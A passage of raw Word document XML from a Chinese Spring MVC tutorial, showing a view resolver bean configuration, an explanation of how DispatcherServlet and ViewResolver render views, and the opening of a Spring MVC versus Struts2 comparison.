          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="993300"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag-name"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="993300"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="attribute"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="attribute-value"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"prefix"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="attribute"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="attribute-value"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"/WEB-INF/views/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="993300"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57008" w:rsidRDefault="00B57008" w:rsidP="00B57008">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="180" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="993300"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag-name"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="993300"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="attribute"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="attribute-value"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"suffix"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="attribute"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="attribute-value"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>".jsp"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="993300"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57008" w:rsidRDefault="00B57008" w:rsidP="00B57008">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="6CE26C"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="180" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="5C5C5C"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="993300"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag-name"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="993300"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="993300"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57008" w:rsidRDefault="00B57008" w:rsidP="00B57008">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>中，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>ViewResolver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>bean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>来配置的，所以扩展起来非常的容易，可以根据自己的需要定制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>ViewResolver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>，然后在配置文件中进行相关的配置即可。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57008" w:rsidRDefault="00B57008" w:rsidP="00B57008">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>       ViewResolver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>接口声明了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>resolverViewName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>方法，这个方法的主要功能是根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>ModelAndView</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>中给定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>viewName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>信息，再结合相关的配置，创建出合适类型的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>View</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B57008" w:rsidRDefault="00B57008" w:rsidP="00B57008">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="260" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>       ViewResolver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>接口是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>中进行调用的，当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>调用完</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>后，会得到一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>ModelAndView</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>对象，然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>DispatcherServlet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>会调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>render</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>方法进行视图渲染。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302F54" w:rsidRPr="00D333FF" w:rsidRDefault="00302F54" w:rsidP="00387E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60512" w:rsidRPr="00F41A4C" w:rsidRDefault="00743AD8" w:rsidP="00C60512">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C60512" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  Springmvc</w:t>
      </w:r>
      <w:r w:rsidR="00C60512">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="00C60512">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Struts2</w:t>
      </w:r>
      <w:r w:rsidR="00C60512">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00777106" w:rsidRDefault="00777106" w:rsidP="004A665C">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="260"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、入口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00534B35" w:rsidRDefault="004A665C" w:rsidP="004A665C">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="260"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>spring mvc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的入口是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="111111"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>servlet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
